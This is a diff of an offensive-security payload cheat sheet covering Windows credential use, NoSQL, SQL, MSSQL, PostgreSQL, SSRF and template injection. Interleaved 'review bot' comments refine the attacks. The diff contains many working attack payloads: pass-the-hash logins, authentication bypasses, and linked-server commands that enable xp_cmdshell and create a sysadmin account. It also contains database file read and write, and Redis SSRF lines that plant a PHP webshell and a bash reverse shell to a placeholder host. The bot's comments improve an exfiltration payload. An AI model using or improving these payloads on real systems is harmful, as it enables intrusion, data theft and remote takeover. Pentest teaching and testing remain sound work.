-xfreerd /u:runner /v:10.0.0.1 # password will be asked +root@payload$ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ +root@payload$ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group. +root@payload$ xfreerd /u:runner /v:10.0.0.1 # password will be asked ``` ## Netuse @@ -192,19 +252,18 @@ xfreerd /u:runner /v:10.0.0.1 # password will be asked Windows only ```powershell -net use \\ordws01.cscou.lab /user:DOMAIN\username password -C$ +PS C:\> net use \\ordws01.cscou.lab /user:DOMAIN\username password C$ ``` ## Runas ```powershell -runas /netonly /user:DOMAIN\username "cmd.exe" -runas /noprofil /netonly /user:DOMAIN\username cmd.exe +PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe" +PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe ``` ## References - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) -- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) +- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) \ No newline at end of file diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 7c203b8..cebfe1b 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md 
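Review bot: `root@payload$ run getgui -u admin -p 1234` is wrong: `run getgui` is a Meterpreter post-exploitation command, so the prompt should be `meterpreter >` rather than a Linux shell prompt, and since this hunk exists to add the prompt prefixes it is the place to get that right. Also `xfreerd /u:runner /v:10.0.0.1` keeps the `xfreerd` typo from the removed line; it should be `xfreerdp`. The two pass-the-hash lines mix the `/u:` and `-u` option styles of different FreeRDP generations; a comment saying which syntax belongs to which version would save the reader a failed attempt.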
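Review bot: `net use \\ordws01.cscou.lab /user:DOMAIN\username password C$` is still not a valid `net use` invocation: the share has to be part of the UNC path and the password is positional after it, i.e. `net use \\ordws01.cscou.lab\C$ password /user:DOMAIN\username` (the old version had `C$` stranded on its own line; this one strands it at the end of the line). In the Runas block, `/noprofil` should be `/noprofile`, the documented switch, and is carried unchanged into the new prompt-prefixed line.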
@@ -27,8 +27,11 @@ Basic authentication bypass using not equal ($ne) or greater ($gt) ```json -in URL +in DATA username[$ne]=toto&password[$ne]=toto +login[$regex]=a.*&pass[$ne]=lol +login[$gt]=admin&login[$lt]=test&pass[$ne]=1 +login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto in JSON {"username": {"$ne": null}, "password": {"$ne": null}} diff --git a/README.md b/README.md index f6586c4..478a9a5 100644 --- a/README.md +++ b/README.md @@ -17,6 +17,9 @@ You might also like the `Methodology and Resources` folder : - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/) - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md) + - [Cloud - AWS Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md) + - [Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md) + - [Cobalt Strike - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md) - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md) - [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md) 
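Review bot: the three new form-data payloads switch from `username`/`password` to `login`/`pass` for what are the same two fields; use one pair so it is clear these are variants of the same bypass and not different endpoints. Also "in DATA" and "in JSON" are bare labels inside a ```json fence, and the first group is URL-encoded form data, not JSON; splitting the two groups into separate fences (or a short heading each) would render correctly.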
@@ -31,23 +34,7 @@ You might also like the `Methodology and Resources` folder : - [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md) - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md) - - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits) - - Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py - - Apache Struts 2 CVE-2017-9805.py - - Apache Struts 2 CVE-2018-11776.py - - Docker API RCE.py - - Drupalgeddon2 CVE-2018-7600.rb - - Heartbleed CVE-2014-0160.py - - JBoss CVE-2015-7501.py - - Jenkins CVE-2015-8103.py - - Jenkins CVE-2016-0792.py - - Rails CVE-2019-5420.rb - - Shellshock CVE-2014-6271.py - - Tomcat CVE-2017-12617.py - - WebLogic CVE-2016-3510.py - - WebLogic CVE-2017-10271.py - - WebLogic CVE-2018-2894.py - - WebSphere CVE-2015-7450.py + You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections. diff --git a/SAML Injection/README.md b/SAML Injection/README.md index e244bfd..2ba8dae 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md 
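Review bot: the README hunk drops the whole `CVE Exploits` list but leaves a line containing only `+ ` (a single space) in its place; that whitespace-only line should go too. If the `CVE Exploits` folder still exists in the repository, the parent link `[CVE Exploits](.../CVE%20Exploits)` should survive even if the per-file bullets are removed; as written, the README no longer mentions that folder at all.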
@@ -70,7 +70,7 @@ XML Signature Wrapping (XSW) attack, some implementations check for a valid sign - XSW1 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response after the existing signature. - XSW2 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response before the existing signature. - XSW3 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion before the existing Assertion. -- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion after the existing Assertion. +- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion within the existing Assertion. - XSW5 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed at the end of the SAML message. - XSW6 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed after the original signature. - XSW7 – Applies to SAML Assertion messages. Add an “Extensions” block with a cloned unsigned assertion. diff --git a/SQL Injection/Intruder/Generic_Fuzz.txt b/SQL Injection/Intruder/Generic_Fuzz.txt new file mode 100644 index 0000000..624fb4d --- /dev/null +++ b/SQL Injection/Intruder/Generic_Fuzz.txt @@ -0,0 +1,12 @@ +1 +1' +1" +[1] +1` +1\ +1/*'*/ +1/*!1111'*/ +1'||'asd'||' +1' or '1'='1 +1 or 1=1 +'or''=' \ No newline at end of file diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 0e79365..35836c8 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -17,6 +17,7 @@ * [MSSQL Command execution](#mssql-command-execution) * [MSSQL UNC path](#mssql-unc-path) * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) +* [MSSQL Trusted Links](#mssql-trusted-links) ## MSSQL comments 
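Review bot: the XSW4 wording changes from "after the existing Assertion" to "within the existing Assertion" without a source; since the XSW1 to XSW7 descriptions in this list follow the SAML Raider numbering, cite the implementation you checked (or the Somorovsky et al. "On Breaking SAML" paper that defined the eight XSW variants) so the next editor does not flip it back.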
@@ -25,6 +26,12 @@ /* comment goes here */ ``` +## MSSQL User + +```sql +SELECT CURRENT_USER +``` + ## MSSQL version ```sql @@ -162,6 +169,25 @@ sqsh -S 192.168.1.X -U sa -P superPassword python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758 ``` +Execute Python script + +> Executed by a different user than the one using xp_cmdshell to execute commands + +```powershell +#Print the user being used (and execute commands) +EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' +EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))' +#Open and read a file +EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' +#Multiline +EXECUTE sp_execute_external_script @language = N'Python', @script = N' +import sys +print(sys.version) +' +GO +``` + + ## MSSQL UNC Path MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. 
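Review bot: `SELECT CURRENT_USER` returns the database user (often `dbo` or `guest`), not the server login; for an injection cheat sheet the reader usually wants the login and whether it is sysadmin, so add `SELECT SYSTEM_USER` and `SELECT IS_SRVROLEMEMBER('sysadmin')` (returns 1 when the current login is a sysadmin) next to it, with a comment on the difference.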
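Review bot: the `sp_execute_external_script` block is T-SQL inside a ```powershell fence with `#` comments; `#` is not a T-SQL comment and the block errors if pasted as-is, so switch to `--` and a ```sql fence like the rest of the file. It also omits its prerequisites: the procedure only exists when Machine Learning Services (Python) is installed with the instance and `external scripts enabled` is on (`EXEC sp_configure 'external scripts enabled', 1; RECONFIGURE;`, which itself needs sysadmin). The quoted note "Executed by a different user" would be clearer stated directly: the script runs under a Launchpad worker account, not the SQL Server service account, so it is a separate identity from `xp_cmdshell` with possibly different filesystem access, which is why the `getuser()` line is there.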
@@ -176,8 +202,42 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; ``` +## MSSQL Trusted Links + +> The links between databases work even across forest trusts. + +```powershell +msf> use exploit/windows/mssql/mssql_linkcrawler +[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio +``` + +Manual exploitation + +```sql +-- find link +select * from master..sysservers + +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + ## References * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf) +* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links) +* [SQL Server – Link… Link… Link… and 
Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) +* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) \ No newline at end of file diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 00bbbf4..e25c1c5 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -14,6 +14,7 @@ * [PostgreSQL List tables](#postgresql-list-tables) * [PostgreSQL List columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) +* [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) * [PostgreSQL Stacked query](#postgresql-stacked-query) @@ -106,6 +107,21 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table' ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` +## PostgreSQL XML helpers + +```sql +select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row +``` + +The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result. + +```sql +select database_to_xml(true,true,''); -- dump the current database to XML +select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema +``` + +Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition. + ## PostgreSQL Blind ```sql 
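Review bot: the `EXECUTE(...) AT LinkedServer` lines (enabling `xp_cmdshell`, creating the `hacker` login) only work when the link has `rpc out` enabled, which is off by default; the `openquery(...)` lines do not need it. Say so in a comment and show how to check: `SELECT name, is_rpc_out_enabled, is_data_access_enabled FROM sys.servers`. Smaller points: "sessio" in the metasploit block is cut off ("session"), that block is Metasploit console input rather than PowerShell so the fence tag is misleading, and the unchanged `EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;` context line right above has an unbalanced quote worth fixing in passing.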
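Review bot: the XML helpers section tells the reader to chain `query_to_xml` with the error-based technique but never shows the combined payload, which is the useful part; add one line built from the error-based pattern already in this file, e.g. `' and 1=cast(query_to_xml('select * from pg_user',true,true,'') as int)-- `. Two things to state with it: the whole XML document comes back inside the cast error, so the application has to reflect the full error text for this to pay off, and `database_to_xml`/`database_to_xmlschema` only include tables the current role can `SELECT` from, in addition to the memory caveat already noted.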
@@ -135,7 +151,7 @@ select pg_ls_dir('./'); select pg_read_file('PG_VERSION', 0, 200); ``` -NOTE: ``pg_read_file` doesn't accept the `/` character. +NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer versions (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group. ```sql CREATE TABLE temp(t TEXT); @@ -143,6 +159,12 @@ COPY temp FROM '/etc/passwd'; SELECT * FROM temp limit 1 offset 0; ``` +```sql +SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID +SELECT lo_get(16420); -- use the OID returned from the above +SELECT * from pg_largeobject; -- or just get all the large objects and their data +``` + ## PostgreSQL File Write ```sql @@ -152,6 +174,12 @@ SELECT * FROM pentestlab; COPY pentestlab(t) TO '/tmp/pentestlab'; ``` +```sql +SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data +SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20 +SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport +``` + ## PostgreSQL Command execution ### CVE-2019–9193 
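Review bot: the role name in the rewritten NOTE is wrong: the SQL-visible default role introduced by the referenced commit is `pg_read_server_files` (with `pg_write_server_files` and `pg_execute_server_program` alongside it), not `default_role_read_server_files`, which is only the C-level identifier. Suggest pinning "newer versions" to PostgreSQL 11, where those roles shipped, and showing the membership check: `SELECT pg_has_role(current_user, 'pg_read_server_files', 'member');`.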
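Review bot: the `lo_import` block hard-codes the returned OID (`16420`) in the next line and then tells the reader to replace it; the two steps collapse into one that works from a single injection point: `SELECT lo_get(lo_import('/etc/passwd'));`. Also worth saying that `lo_import`/`lo_export` are superuser-only (or `pg_read_server_files`/`pg_write_server_files` on 11+) because the server process, not the client, opens the file, and that reading `pg_largeobject` directly, as the last line does, is itself restricted to superusers by default.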
@@ -180,4 +208,5 @@ SELECT system('cat /etc/passwd | nc '); * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) -* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) +* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) +* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 25b035e..15bb292 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -31,6 +31,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [Authentication bypass](#authentication-bypass) + * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) @@ -288,6 +289,9 @@ tamper=name_of_the_tamper "&" "^" "*" +'--' +"--" +'--' / "--" " or ""-" " or "" " " or ""&" 
@@ -340,6 +344,7 @@ admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- +admin';-- azer admin" # admin"/* admin" or "1"="1 @@ -362,7 +367,7 @@ admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` -## Authentication Bypass (Raw MD5) +## Authentication Bypass (Raw MD5 SHA1) When a raw md5 is used, the pass will be queried as a simple string, not a hexstring. @@ -374,6 +379,7 @@ Allowing an attacker to craft a string with a `true` statement such as `' or 'SO ```php md5("ffifdyop", true) = 'or'6�]��!r,��b +sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-! ``` Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772) @@ -382,6 +388,9 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj. ```sql SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ + +/* MySQL only */ +IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ ``` ## Routed injection diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 428e806..dcece85 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -88,4 +88,4 @@ Note: By default this component is disabled ## References -[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf) +[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf) 
diff --git a/Server Side Template Injection/Files/SSRF_expect.svg b/Server Side Request Forgery/Files/SSRF_expect.svg similarity index 100% rename from Server Side Template Injection/Files/SSRF_expect.svg rename to Server Side Request Forgery/Files/SSRF_expect.svg diff --git a/Server Side Template Injection/Files/SSRF_url.svg b/Server Side Request Forgery/Files/SSRF_url.svg similarity index 100% rename from Server Side Template Injection/Files/SSRF_url.svg rename to Server Side Request Forgery/Files/SSRF_url.svg diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 8cc6592..0b889ec 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -15,6 +15,7 @@ * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding) * [Bypass using malformed urls](#bypass-using-malformed-urls) * [Bypass using rare address](#bypass-using-rare-address) + * [Bypass using URL encoding](#bypass-using-url-encoding) * [Bypass using bash variables](#bypass-using-bash-variables) * [Bypass using tricks combination](#bypass-using-tricks-combination) * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) @@ -30,7 +31,9 @@ * [gopher://](#gopher) * [netdoc://](#netdoc) * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi) +* [SSRF exploiting Redis](#ssrf-exploiting-redis) * [SSRF to XSS](#ssrf-to-xss) +* [SSRF from XSS](#ssrf-from-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs) 
@@ -76,22 +79,6 @@ http://localhost:443 http://localhost:22 ``` -Advanced exploit using a redirection - -```powershell -1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com -2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP -vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 -``` - -Advanced exploit using type=url - -```powershell -Change "type=file" to "type=url" -Paste URL in text field and hit enter -Using this vulnerability users can upload images from any image URL = trigger an SSRF -``` - ## Bypassing filters ### Bypass using HTTPS @@ -177,6 +164,15 @@ http://127.1 http://127.0.1 ``` +### Bypass using URL encoding + +[Single or double encode a specific URL to bypass blacklist](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter) + +```powershell +http://127.0.0.1/%61dmin +http://127.0.0.1/%2561dmin +``` + ### Bypass using bash variables (curl only) 
@@ -225,6 +221,30 @@ http://127.1.1.1:80#\@127.2.2.2:80/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) +### Bypassing using a redirect +[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) + +```powershell +1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) +2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP +vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 +``` + +### Bypassing using type=url + +```powershell +Change "type=file" to "type=url" +Paste URL in text field and hit enter +Using this vulnerability users can upload images from any image URL = trigger an SSRF +``` + +### Bypassing using DNS Rebinding (TOCTOU) + +```powershell +Create a domain that change between two IPs. http://1u.ms/ exists for this purpose. +For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain: +make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms +``` ## SSRF exploitation via URL Scheme 
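Review bot: the relocated redirect step reads `redirects requests to the SSRF the target URL (e.g. 192.168.0.1)`, which is garbled; `redirects to the internal target (e.g. http://192.168.0.1)` says what is meant. Step 2 also still points at `YOUR_SERVER_IP` although step 1 now says the redirector lives on a whitelisted host, so the two steps disagree on where the redirect page is; pick one and use it in both lines. In the DNS rebinding block, `169.254-169.254` in the prose is inconsistent with the dotted `1.2.3.4` next to it and with the address the dashed domain encodes; write `169.254.169.254` in the sentence and keep the dashed form only inside the `1u.ms` domain, or explain the notation. `a domain that change between two IPs` should be `changes`, and the `### Bypassing using a redirect` heading lacks the blank line before the link that every other heading in this file has.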
@@ -378,6 +398,32 @@ gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py | value data | (n bytes) | | /tmp/test.py | | +## SSRF exploiting Redis + +> Redis is a database system that stores everything in RAM + +```powershell +# Getting a webshell +url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html +url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php +url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>" +url=dict://127.0.0.1:6379/SAVE + +# Getting a PHP reverse shell +gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml +gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php +gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22 +gopher://127.0.0.1:6379/_save +``` + +## SSRF exploiting PDF file + +Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title) + +```powershell + +``` + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) @@ -389,6 +435,25 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg ``` +## SSRF from XSS + +### Using an iframe + +The content of the file will be integrated inside the PDF as an image or text. + +```html + +``` + +### Using an attachment + +Example of a PDF attachment using HTML + +1. use `` as Bio text +2. use 'Download Data' feature to get PDF +3. use `pdfdetach -saveall filename.pdf` to extract embedded resource +4. `cat attachment.bin` + ## SSRF URL for Cloud Instances ### SSRF URL for AWS Bucket 
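Review bot: the `## SSRF exploiting PDF file` section ships with an empty `powershell` fence, so the WeasyPrint reference carries no payload or explanation; either add the HTML the renderer fetches or hold the section until there is content (it is also the only new `##` heading without a summary entry). The `## SSRF from XSS` section opens with `The content of the file will be integrated inside the PDF` without saying which PDF: a lead sentence that this targets HTML-to-PDF generators rendering user-supplied HTML (the `Bio` field in the attachment example) is needed for the iframe and attachment steps to make sense, and step 4 `cat attachment.bin` should say what the reader is looking at (the fetched file). For the Redis block, `stores everything in RAM` is not the relevant property; what the payload depends on is an unauthenticated Redis reachable on `127.0.0.1:6379` whose process can write to the web root, because `CONFIG SET dir`/`dbfilename` plus `SAVE` drop an RDB file there; stating those preconditions would save readers a failed attempt.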
@@ -407,7 +472,6 @@ DNS record ```powershell http://instance-data http://169.254.169.254 -http://metadata.nicob.net/ http://169.254.169.254.xip.io/ http://1ynrnhl.xip.io/ http://www.owasp.org.1ynrnhl.xip.io/ diff --git a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt b/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt deleted file mode 100644 index 9b7ba08..0000000 --- a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt +++ /dev/null @@ -1,75 +0,0 @@ -
-
 
-
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/Server Side Template Injection/Intruder/ssi_quick.txt b/Server Side Template Injection/Intruder/ssi_quick.txt deleted file mode 100644 index fef3ab2..0000000 --- a/Server Side Template Injection/Intruder/ssi_quick.txt +++ /dev/null @@ -1,18 +0,0 @@ - - - - - - - - - - - - - - - - - - diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz new file mode 100644 index 0000000..ced385b --- /dev/null +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -0,0 +1,49 @@ + +{{4*4}}[[5*5]] +{{7*7}} +{{7*'7'}} +<%= 7 * 7 %> +${3*3} +${{7*7}} +@(1+2) +#{3*3} +#{ 7 * 7 } +{{dump(app)}} +{{app.request.server.all|join(',')}} +{{config.items()}} +{{ [].class.base.subclasses() }} +{{''.class.mro()[1].subclasses()}} +{{ ''.__class__.__mro__[2].__subclasses__() }} +{% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
